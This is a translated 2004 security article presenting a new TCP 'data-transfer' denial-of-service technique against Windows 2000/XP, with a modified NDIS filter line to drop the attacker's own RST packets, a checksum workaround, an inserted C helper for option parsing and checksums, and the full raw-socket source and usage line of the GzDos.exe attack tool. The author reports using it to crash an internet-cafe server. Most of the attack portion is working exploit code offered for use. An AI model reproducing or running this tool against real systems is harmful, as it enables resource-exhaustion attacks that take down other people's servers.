A new DoS: Data-Transfer DoS against TCP connections. First published on XFOCUS: http://www.xfocus.net/articles/200408/728.html
Author: liond8
Email: liond8@126.com
QQ: 10415468
Website: liond8.126.com
Date: 2004.08.12
Test platform: VC 6.0, Windows 2000 Server
Target platform: Windows 2000, Windows XP

The NAPTHA attack suddenly gave me an idea: I wanted to extend its forged-connection technique so that it can be run from an ordinary personal PC and is no longer restricted to a local area network. I spent some time studying it, and what is written below is the result. It is not very mature yet, so I am sharing it for discussion.

About NAPTHA: a NAPTHA tool was already written in 2000. Why did it have to be used on a LAN? Partly to stay better hidden, but the more important reason is to stop your own host, when it receives the remote host's second handshake packet (the SYN/ACK), from emitting an RST that tears the forged connection down. Besides, NAPTHA by itself has little effect on Windows: how much memory does Windows spend on one half-open connection? The idea here is to finish the handshake and then keep pushing data; every time the target acknowledges, the data is transferred again.

A is the attacker, C is the target:

    A  SYN        -------->  C
    A  SYN,ACK    <--------  C
    A  ACK        -------->  C
    A  send data  -------->  C
    A  ACK        <--------  C
    A  send data  -------->  C
    A  ACK        <--------  C
    ...

Test results: against an ordinary ephemeral port (tested on port 1025) it is quite effective. Memory keeps rising until the computer stops responding and finally crashes; 20 minutes were enough to drag down an internet-cafe server. Against port 80 the effect is not as obvious: about 40 MB of memory is consumed and the usage then oscillates, leaving a large number of connections in the FIN_WAIT_1 and ESTABLISHED states. Other ports could not be tested conveniently in my environment; friends who can test them are welcome to send me their results and discuss.

So two problems have to be solved:

1. Hook and drop this machine's own RST packets. Refer to Flashsky's "Writing an NDIS filter hook driver to implement IP packet filtering", http://www.xfocus.net/articles/200210/457.html; only one line of its code needs changing:
Change

    if (Packet[13] == 0x2 && SendInterfaceIndex == INVALID_PF_IF_INDEX)

to

    if (Packet[13] == 0x4 && SendInterfaceIndex != INVALID_PF_IF_INDEX)

In the filter-hook callback, Packet points at the transport header, so Packet[13] is the TCP flags byte (0x02 = SYN, 0x04 = RST), and SendInterfaceIndex is INVALID_PF_IF_INDEX only for received packets. Instead of dropping inbound SYNs, the filter now drops the RSTs this host is about to send. The comparison is exact, so RST+ACK (0x14) still passes; that is enough, because the reset a stack sends in reply to a segment that carries ACK (the unexpected SYN/ACK, and the later ACKs of the forged connection) is a pure RST, <SEQ=SEG.ACK><CTL=RST> in RFC 793. See the original article, which is very detailed.

2. Sending the forged data. Analysis with a sniffer shows that if the peer is to trust this forged connection, the SYN packet must also carry option data that negotiates the maximum segment size (MSS) it can receive. Otherwise, even if the connection is established, the peer does not accept the data, and then its memory cannot be consumed. (A peer that receives no MSS option must assume the default of 536 bytes, RFC 1122, while the data segments this tool sends are 799 bytes long.) An ordinary SYN scan, and NAPTHA's connection request, use a 20-byte TCP header with no options. The options a system sends differ: my Windows 2000 sends 8 bytes, my friend's Windows 2000 sends 12 bytes. Taking my 8 bytes as the example, the TCP header becomes 28 bytes long, so tcpHeader.th_lenres = 0x70 (data offset 7 words, in the high nibble). One more thing that has to be pointed out is how the TCP checksum is calculated.
    USHORT checksum(USHORT *buffer, int size)
    {
        unsigned long cksum = 0;
        while (size > 1) {
            cksum += *buffer++;
            size -= sizeof(USHORT);
        }
        if (size)
            cksum += *(UCHAR *)buffer;
        cksum = (cksum >> 16) + (cksum & 0xffff);
        cksum += (cksum >> 16);
        return (USHORT)(~cksum);
    }

If there is data after the 20-byte TCP header, the checksum computed this way differs from the one Windows 2000 produces; after analysis the difference turns out to depend on the data length. For example, with a 20-byte IP header, a 20-byte TCP header and 2 bytes of data, the function above gives 0x4523 while the system computes 0x4323 (both printed as the raw USHORT on a little-endian machine, i.e. network-order 0x2345 versus 0x2343: a difference of exactly 2, the data length). So the checksum is computed like this:

    tcpHeader.th_sum = checksum((USHORT *)szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) + dwSize);
    tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum) - (USHORT)dwSize);

where dwSize is the length of the data carried. Otherwise the peer does not accept the forged packet, and the goal of consuming its memory is not reached. (The difference comes from the pseudo-header: psdHeader.tcpl is filled with htons(sizeof(tcpHeader)) instead of the real segment length sizeof(tcpHeader) + dwSize, so the one's-complement result is off by dwSize. Subtracting dwSize afterwards compensates, except when the subtraction borrows, where the result is one too large; filling the real length into the pseudo-header needs no correction at all.)

The test code follows. Since this program can do a certain amount of harm, it was deliberately not written as a convenient tool: the option bytes have to be sniffed by hand and entered on the command line.
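As an added example (not the article's code), the following C program shows the two pieces of segment construction discussed under point 2 and in the checksum note above: decoding the sniffed option bytes (the usage line's 020405B401010402 is MSS 1460, NOP, NOP, SACK permitted) and the data-offset byte they imply, and the TCP checksum computed with a correct pseudo-header beside the article's "subtract dwSize" correction. The endpoint addresses and the segments it builds are constructed for the demonstration and are assumptions; it is portable C and sends nothing. It also generalises the checksum point: the two methods agree except when the subtraction borrows, where the article's value is one too large, and find_article_mismatch() locates a two-byte payload that triggers exactly that case.

```c
#include <stdint.h>
#include <string.h>
/* Endpoint addresses for the example (raw network-order bytes): assumed, not from the article. */
const uint8_t SRC[4] = {192, 168, 248, 1};
const uint8_t DST[4] = {192, 168, 248, 128};
/* The option bytes from the article's usage line: MSS 1460, NOP, NOP, SACK permitted. */
const uint8_t PAGE_OPTS[8] = {0x02, 0x04, 0x05, 0xB4, 0x01, 0x01, 0x04, 0x02};
struct tcp_opts { int mss; int wscale; int sack_permitted; int nops; };

/* Walk the (kind, length, data) option list; -1 on a truncated option or a wrong length. */
int parse_tcp_options(const uint8_t *opt, size_t len, struct tcp_opts *o)
{
    size_t i = 0;
    o->mss = -1; o->wscale = -1; o->sack_permitted = 0; o->nops = 0;
    while (i < len) {
        uint8_t kind = opt[i], olen;
        if (kind == 0) return 0;                            /* end of option list */
        if (kind == 1) { o->nops++; i++; continue; }        /* NOP: one byte, no length */
        if (i + 1 >= len || (olen = opt[i + 1]) < 2 || i + olen > len) return -1;
        if (kind == 2 && olen == 4) o->mss = opt[i + 2] << 8 | opt[i + 3];
        else if (kind == 3 && olen == 3) o->wscale = opt[i + 2];
        else if (kind == 4 && olen == 2) o->sack_permitted = 1;
        else if (kind <= 4) return -1;                      /* known kind, wrong length */
        i += olen;                                          /* unknown kinds skipped by length */
    }
    return 0;
}

/* th_lenres: header length in 32-bit words in the high nibble.  Options must be padded to
   a multiple of 4 with NOP/EOL; an unpadded length has no valid offset, so return 0. */
uint8_t data_offset_byte(size_t optlen)
{
    return optlen % 4 ? 0 : (uint8_t)(((20 + optlen) / 4) << 4);
}

/* RFC 1071 checksum over the 12-byte pseudo-header (source, destination, zero, protocol 6,
   TCP length) and the segment, summing big-endian words so host byte order does not matter.
   The segment's own checksum field must be zero.  Returned as a host integer. */
static uint16_t csum(const uint8_t s[4], const uint8_t d[4], uint16_t tcp_len, const uint8_t *seg, size_t n)
{
    uint8_t ph[12] = {0};
    uint32_t acc = 0; size_t i;
    memcpy(ph, s, 4); memcpy(ph + 4, d, 4);
    ph[9] = 6; ph[10] = (uint8_t)(tcp_len >> 8); ph[11] = (uint8_t)tcp_len;
    for (i = 0; i < 12; i += 2) acc += (uint32_t)ph[i] << 8 | ph[i + 1];
    for (i = 0; i + 1 < n; i += 2) acc += (uint32_t)seg[i] << 8 | seg[i + 1];
    if (n & 1) acc += (uint32_t)seg[n - 1] << 8;           /* odd tail byte, zero padded */
    acc = (acc >> 16) + (acc & 0xFFFF);                     /* fold the carries back in */
    return (uint16_t)~(acc + (acc >> 16));
}

/* Correct TCP checksum: pseudo-header length = whole segment (header + options + data). */
uint16_t tcp_checksum(const uint8_t s[4], const uint8_t d[4], const uint8_t *seg, size_t seglen)
{
    return csum(s, d, (uint16_t)seglen, seg, seglen);
}

/* The article's method: pseudo-header length fixed at sizeof(tcpHeader) = 20, then the byte
   count after the base header (its dwSize / optlentemp) subtracted from the host-order value. */
uint16_t tcp_checksum_article(const uint8_t s[4], const uint8_t d[4], const uint8_t *seg, size_t seglen)
{
    uint16_t c = csum(s, d, 20, seg, seglen);
    return (uint16_t)(c - (uint16_t)(seglen - 20));
}

/* Constructed segment: 20-byte header with a zero checksum field, then options, then data. */
size_t build_segment(uint8_t *out, uint16_t sport, uint16_t dport, uint32_t seq, uint32_t ack,
                     uint8_t flags, const uint8_t *opts, size_t optlen, const uint8_t *data, size_t dlen)
{
    int k;
    memset(out, 0, 20);
    out[0] = (uint8_t)(sport >> 8); out[1] = (uint8_t)sport; out[2] = (uint8_t)(dport >> 8); out[3] = (uint8_t)dport;
    for (k = 0; k < 4; k++) { out[4 + k] = (uint8_t)(seq >> (24 - 8 * k)); out[8 + k] = (uint8_t)(ack >> (24 - 8 * k)); }
    out[12] = data_offset_byte(optlen); out[13] = flags;
    out[14] = 0x44; out[15] = 0x70;                         /* window 0x4470, as in the article */
    if (optlen) memcpy(out + 20, opts, optlen);
    if (dlen) memcpy(out + 20 + optlen, data, dlen);
    return 20 + optlen + dlen;
}

/* (article - correct) mod 2^16 for a segment from SRC to DST: 0, or 1 when the subtraction
   borrows, i.e. when the checksum value is smaller than the length subtracted from it. */
int article_error(const uint8_t *seg, size_t seglen)
{
    return (tcp_checksum_article(SRC, DST, seg, seglen) - tcp_checksum(SRC, DST, seg, seglen)) & 0xFFFF;
}

/* The article's own case, a 20-byte PSH/ACK header plus 2 data bytes: scan the data word and
   return the first value for which the subtraction trick is off by one, or -1 if none. */
int find_article_mismatch(void)
{
    uint8_t seg[22], data[2]; int w;
    for (w = 0; w < 0x10000; w++) {
        data[0] = (uint8_t)(w >> 8); data[1] = (uint8_t)w;
        build_segment(seg, 65534, 1025, 0x00198289, 0x12345678, 0x18, NULL, 0, data, 2);
        if (article_error(seg, 22)) return w;
    }
    return -1;
}
```

The checksum value is returned as a host integer, so a caller writing it into a header stores it with htons(); the two computed values are bitwise equal whenever the article's value is at least the length it subtracts, which is why the trick worked in the author's tests but is not safe in general. Since the option bytes differed between the two Windows 2000 machines the article mentions, parse them with parse_tcp_options() rather than assuming 8 or 12 bytes.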
For example:

    GzDos.exe 192.168.248.128 1025 020405B401010402 1000 65534

The arguments are: target IP, target port, the sniffed TCP option bytes in hex (here MSS 1460, NOP, NOP, SACK permitted), the pause in milliseconds between rounds, and the starting source port.

Source of GzDos.exe:
    /* GzDos -- test program from the article (VC 6.0, Windows 2000, raw sockets).
       The struct definitions, convert() and Banner() are missing from the recovered
       text and are supplied here so that the listing builds. */
    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include <mstcpip.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #pragma comment(lib, "ws2_32.lib")

    typedef struct _IPHEADER {
        unsigned char  h_verlen;        /* version (high nibble) and header length in dwords */
        unsigned char  tos;
        unsigned short total_len;
        unsigned short ident;
        unsigned short frag_and_flags;
        unsigned char  ttl;
        unsigned char  proto;
        unsigned short checksum;
        unsigned int   sourceIP;
        unsigned int   destIP;
    } IPHEADER;

    typedef struct _TCPHEADER {
        USHORT        th_sport;
        USHORT        th_dport;
        unsigned int  th_seq;
        unsigned int  th_ack;
        unsigned char th_lenres;        /* data offset (high nibble) and reserved bits */
        unsigned char th_flag;
        USHORT        th_win;
        USHORT        th_sum;
        USHORT        th_urp;
    } TCPHEADER;

    typedef struct _PSDHEADER {         /* pseudo-header for the TCP checksum */
        unsigned long  saddr;
        unsigned long  daddr;
        char           mbz;
        char           ptcl;
        unsigned short tcpl;
    } PSDHEADER;

    typedef struct _ATOBJ {             /* one target: IP plus a 0-terminated port list */
        DWORD  dwIP;
        USHORT uAttackPort[2];
        struct _ATOBJ *next;
    } ATOBJ;

    void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP,
                  char *pBuf, BOOL Isdata, DWORD dwSize);
    DWORD WINAPI ListeningFunc(LPVOID lpvoid);
    DWORD WINAPI ThreadSynFlood(LPVOID lp);
    BOOL   initstart(void);
    DWORD  GetHostIP(void);
    USHORT checksum(USHORT *buffer, int size);
    void   Banner(void);
    void   convert(const char *hex);

    SOCKET         sock = INVALID_SOCKET;   /* raw socket used for every send */
    char          *attackip = NULL;         /* target IP as text */
    USHORT         attackport = 0;
    unsigned char *optbuf = NULL;           /* TCP option bytes sniffed from a real SYN */
    int            optlen = 0;
    DWORD          SleepTime = 1000;        /* pause between rounds, milliseconds */
    int            startport = 1025;        /* first forged source port */
    ATOBJ         *listattackobj = NULL;
    char          *psend = NULL;            /* payload pushed on every ACK */
    int            len = 0;

    int main(int argc, char *argv[])
    {
        char hostname[255] = {0};
        struct hostent *lp = NULL;
        int i;

        Banner();
        psend = (char *)malloc(800);
        memset(psend, 0x38, 799);           /* 799 bytes of '8' */
        psend[799] = 0;
        len = strlen(psend);

        if (argc < 5) {
            printf("Input Error!\n");
            return -1;
        }
        attackip = strdup(argv[1]);
        attackport = (USHORT)atoi(argv[2]);
        convert(argv[3]);
        if (argc >= 5) SleepTime = atoi(argv[4]);
        if (argc >= 6) startport = atoi(argv[5]);

        if (initstart() == FALSE) return -1;
        if (optbuf == NULL) return -1;

        /* one sniffer thread per local address, so the SYN/ACK is seen whichever
           interface it arrives on */
        gethostname(hostname, 255);
        lp = gethostbyname(hostname);
        for (i = 0; lp != NULL && lp->h_addr_list[i] != NULL; i++) {
            DWORD dwip = *(DWORD *)lp->h_addr_list[i];
            HANDLE h = CreateThread(NULL, 0, ListeningFunc, (LPVOID)dwip, 0, NULL);
            if (h == NULL) {
                printf("Create ListeningFunc thread false!\n");
                return -1;
            }
            Sleep(500);
        }
        ThreadSynFlood(NULL);
        Sleep(5555555);                     /* keep the sniffer threads alive */
        return 0;
    }

    void Banner(void)
    {
        printf("GzDos - Data-Transfer DoS against TCP connections, liond8, 2004.08.12\n");
        printf("Usage: GzDos.exe <target ip> <port> <tcp option bytes in hex> [sleep ms] [start port]\n");
    }

    /* Decode the option bytes typed on the command line ("020405B401010402")
       into optbuf / optlen. */
    void convert(const char *hex)
    {
        size_t n = strlen(hex) / 2, i;
        optbuf = (unsigned char *)malloc(n + 1);
        for (i = 0; i < n; i++) {
            unsigned int b;
            if (sscanf(hex + 2 * i, "%2x", &b) != 1) break;
            optbuf[i] = (unsigned char)b;
        }
        optlen = (int)i;
    }

    BOOL initstart(void)
    {
        BOOL flag;
        int nTimeOver;
        WSADATA wsaData;

        if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
            printf("WSAStartup Error!\n");
            return FALSE;
        }
        listattackobj = (ATOBJ *)calloc(1, sizeof(ATOBJ));
        listattackobj->dwIP = inet_addr(attackip);
        listattackobj->uAttackPort[0] = htons(attackport);
        listattackobj->uAttackPort[1] = 0;      /* list terminator */
        listattackobj->next = NULL;

        if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
            printf("Socket Setup Error!\n");
            return FALSE;
        }
        flag = TRUE;                            /* we build the IP header ourselves */
        if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
            printf("setsockopt IP_HDRINCL error!\n");
            return FALSE;
        }
        nTimeOver = 2000;                       /* send timeout, milliseconds */
        if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&nTimeOver, sizeof(nTimeOver)) == SOCKET_ERROR) {
            printf("setsockopt SO_SNDTIMEO error!\n");
            return FALSE;
        }
        return TRUE;
    }

    /* Send one forged SYN (with the sniffed options) per source port to every
       target port, then sleep SleepTime before the next port. */
    DWORD WINAPI ThreadSynFlood(LPVOID lp)
    {
        ATOBJ *pAtObj = listattackobj;
        SOCKADDR_IN addr_in;
        IPHEADER ipHeader;
        TCPHEADER tcpHeader;
        PSDHEADER psdHeader;
        char szSendBuf[1024] = {0};
        int l;

        while (pAtObj != NULL) {
            addr_in.sin_family = AF_INET;
            addr_in.sin_port = 0;
            addr_in.sin_addr.S_un.S_addr = pAtObj->dwIP;

            ipHeader.h_verlen = (4 << 4 | sizeof(ipHeader) / sizeof(unsigned long));
            ipHeader.tos = 0;
            ipHeader.total_len = htons(sizeof(ipHeader) + sizeof(TCPHEADER) + optlen);  /* IP total length */
            ipHeader.ident = 1;
            ipHeader.frag_and_flags = 0x0040;   /* don't fragment */
            ipHeader.ttl = 0x80;
            ipHeader.proto = IPPROTO_TCP;
            ipHeader.checksum = 0;
            ipHeader.destIP = pAtObj->dwIP;
            ipHeader.sourceIP = GetHostIP();

            tcpHeader.th_ack = 0;
            tcpHeader.th_lenres = (optlen / 4 + 5) << 4;    /* 20-byte header plus options */
            tcpHeader.th_flag = 2;                          /* SYN */
            tcpHeader.th_win = htons(0x4470);
            tcpHeader.th_urp = 0;
            tcpHeader.th_seq = htonl(0x00198288);           /* fixed ISN; the sniffer looks for ISN+1 */

            for (l = startport; l < 65535; l++) {
                int k = 0;
                while (pAtObj->uAttackPort[k] != 0) {
                    int optlentemp = optlen;
                    int rect;

                    tcpHeader.th_dport = pAtObj->uAttackPort[k];
                    tcpHeader.th_sport = htons((USHORT)l);
                    tcpHeader.th_sum = 0;
                    psdHeader.saddr = ipHeader.sourceIP;
                    psdHeader.daddr = ipHeader.destIP;
                    psdHeader.mbz = 0;
                    psdHeader.ptcl = IPPROTO_TCP;
                    psdHeader.tcpl = htons(sizeof(tcpHeader));

                    /* checksum over pseudo-header + TCP header + options, then the
                       option-length correction described above */
                    memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
                    memcpy(szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
                    memcpy(szSendBuf + sizeof(psdHeader) + sizeof(tcpHeader), optbuf, optlentemp);
                    tcpHeader.th_sum = checksum((USHORT *)szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) + optlentemp);
                    tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum) - (USHORT)optlentemp);

                    memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
                    memcpy(szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
                    memcpy(szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), optbuf, optlentemp);
                    rect = sendto(sock, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) + optlentemp, 0,
                                  (struct sockaddr *)&addr_in, sizeof(addr_in));
                    if (rect == SOCKET_ERROR) {
                        printf("Send Error!: %x\n", WSAGetLastError());
                        return FALSE;
                    } else {
                        printf("Send OK %d\n", l);
                    }
                    k++;
                }
                Sleep(SleepTime);
            }
            pAtObj = pAtObj->next;
        }
        return 0;
    }

    /* Last address in this host's address list. */
    DWORD GetHostIP(void)
    {
        DWORD dwip = 0;
        int i = 0;
        struct hostent *lp = NULL;
        char hostname[255] = {0};

        gethostname(hostname, 255);
        lp = gethostbyname(hostname);
        while (lp->h_addr_list[i] != NULL)
            i++;
        dwip = *(DWORD *)lp->h_addr_list[--i];
        return dwip;
    }

    USHORT checksum(USHORT *buffer, int size)
    {
        unsigned long cksum = 0;
        while (size > 1) {
            cksum += *buffer++;
            size -= sizeof(USHORT);
        }
        if (size)
            cksum += *(UCHAR *)buffer;
        cksum = (cksum >> 16) + (cksum & 0xffff);
        cksum += (cksum >> 16);
        return (USHORT)(~cksum);
    }

    /* Sniff replies from the target on one local address and drive the forged
       connection: answer SYN/ACK with ACK + data, answer every ACK with more data. */
    DWORD WINAPI ListeningFunc(LPVOID lpvoid)
    {
        SOCKET rawsock;
        SOCKADDR_IN addr_in = {0};
        DWORD lpvBuffer = 1;
        DWORD lpcbBytesReturned = 0;
        int ret;

        if ((rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
            printf("Sniffer Socket Setup Error!\n");
            return FALSE;
        }
        addr_in.sin_family = AF_INET;
        addr_in.sin_port = htons(8288);
        addr_in.sin_addr.S_un.S_addr = (DWORD)lpvoid;
        /* bind to the local IP and port, then switch the interface to receive-all mode */
        ret = bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
        if (ret == SOCKET_ERROR) {
            printf("bind false\n");
            exit(0);
        }
        WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0, &lpcbBytesReturned, NULL, NULL);

        while (TRUE) {
            SOCKADDR_IN from = {0};
            int size = sizeof(from);
            char recvbuf[256] = {0};
            IPHEADER *lpIPheader;
            TCPHEADER *lpTCPheader;

            /* receive a packet */
            ret = recvfrom(rawsock, recvbuf, sizeof(recvbuf), 0, (struct sockaddr *)&from, &size);
            if (ret == SOCKET_ERROR)
                continue;
            /* analyse it: only TCP from the target is interesting */
            lpIPheader = (IPHEADER *)recvbuf;
            if (lpIPheader->proto != IPPROTO_TCP || lpIPheader->sourceIP != inet_addr(attackip))
                continue;
            lpTCPheader = (TCPHEADER *)(recvbuf + sizeof(IPHEADER));
            if (lpTCPheader->th_flag == 0x12) {
                /* SYN/ACK: the remote port is open.  Is it answering our forged SYN? */
                if (lpTCPheader->th_ack == htonl(0x00198289)) {
                    /* forged third handshake packet (ACK) */
                    SendData(lpTCPheader->th_ack, htonl(ntohl(lpTCPheader->th_seq) + 1),
                             lpTCPheader->th_dport, lpTCPheader->th_sport,
                             lpIPheader->destIP, lpIPheader->sourceIP, NULL, FALSE, 0);
                    /* and immediately push data on the new connection */
                    SendData(lpTCPheader->th_ack, htonl(ntohl(lpTCPheader->th_seq) + 1),
                             lpTCPheader->th_dport, lpTCPheader->th_sport,
                             lpIPheader->destIP, lpIPheader->sourceIP, psend, TRUE, len);
                }
            } else if (lpTCPheader->th_flag == 0x10) {
                /* ACK: the target accepted the data, so send it again */
                SendData(lpTCPheader->th_ack, lpTCPheader->th_seq,
                         lpTCPheader->th_dport, lpTCPheader->th_sport,
                         lpIPheader->destIP, lpIPheader->sourceIP, psend, TRUE, len);
            }
        }
    }

    /* Send one segment SIP:SPort -> AIP:APort: a bare ACK when pBuf is NULL,
       otherwise PSH/ACK carrying dwSize bytes of pBuf. */
    void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP,
                  char *pBuf, BOOL Isdata, DWORD dwSize)
    {
        SOCKADDR_IN addr_in;
        IPHEADER ipHeader;
        TCPHEADER tcpHeader;
        PSDHEADER psdHeader;
        char szSendBuf[1024] = {0};
        int rect = 0;

        addr_in.sin_family = AF_INET;
        addr_in.sin_port = APort;
        addr_in.sin_addr.S_un.S_addr = AIP;

        ipHeader.h_verlen = (4 << 4 | sizeof(ipHeader) / sizeof(unsigned long));
        ipHeader.tos = 0;
        ipHeader.ident = 1;
        ipHeader.frag_and_flags = 0x0040;
        ipHeader.ttl = 0x80;
        ipHeader.proto = IPPROTO_TCP;
        ipHeader.checksum = 0;
        ipHeader.destIP = AIP;
        ipHeader.sourceIP = SIP;
        ipHeader.total_len = htons(sizeof(ipHeader) + sizeof(tcpHeader) + dwSize);

        tcpHeader.th_sport = SPort;
        tcpHeader.th_dport = APort;
        tcpHeader.th_seq = SEQ;
        tcpHeader.th_ack = ACK;
        tcpHeader.th_lenres = (sizeof(tcpHeader) / 4 << 4 | 0);
        tcpHeader.th_flag = Isdata ? 0x18 : 0x10;       /* PSH|ACK, or plain ACK */
        tcpHeader.th_win = htons(0x4470);
        tcpHeader.th_urp = 0;
        tcpHeader.th_sum = 0;

        psdHeader.saddr = ipHeader.sourceIP;
        psdHeader.daddr = ipHeader.destIP;
        psdHeader.mbz = 0;
        psdHeader.ptcl = IPPROTO_TCP;
        psdHeader.tcpl = htons(sizeof(tcpHeader));

        memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
        memcpy(szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
        if (pBuf != NULL) {
            /* with data: checksum over the data too, then the dwSize correction */
            memcpy(szSendBuf + sizeof(psdHeader) + sizeof(tcpHeader), pBuf, dwSize);
            tcpHeader.th_sum = checksum((USHORT *)szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) + dwSize);
            tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum) - (USHORT)dwSize);
        } else {
            tcpHeader.th_sum = checksum((USHORT *)szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader));
        }

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
        if (pBuf == NULL) {
            rect = sendto(sock, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader), 0,
                          (struct sockaddr *)&addr_in, sizeof(addr_in));
        } else {
            memcpy(szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), pBuf, dwSize);
            rect = sendto(sock, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) + dwSize, 0,
                          (struct sockaddr *)&addr_in, sizeof(addr_in));
        }
        if (rect == SOCKET_ERROR) {
            printf("Send Error!: %x\n", WSAGetLastError());
            return;
        } else {
            if (pBuf != NULL)
                printf("SendData OK %d\n", ntohs(SPort));
            else
                printf("SendAck OK %d\n", ntohs(SPort));   /* the recovered listing breaks off here */
        }
    }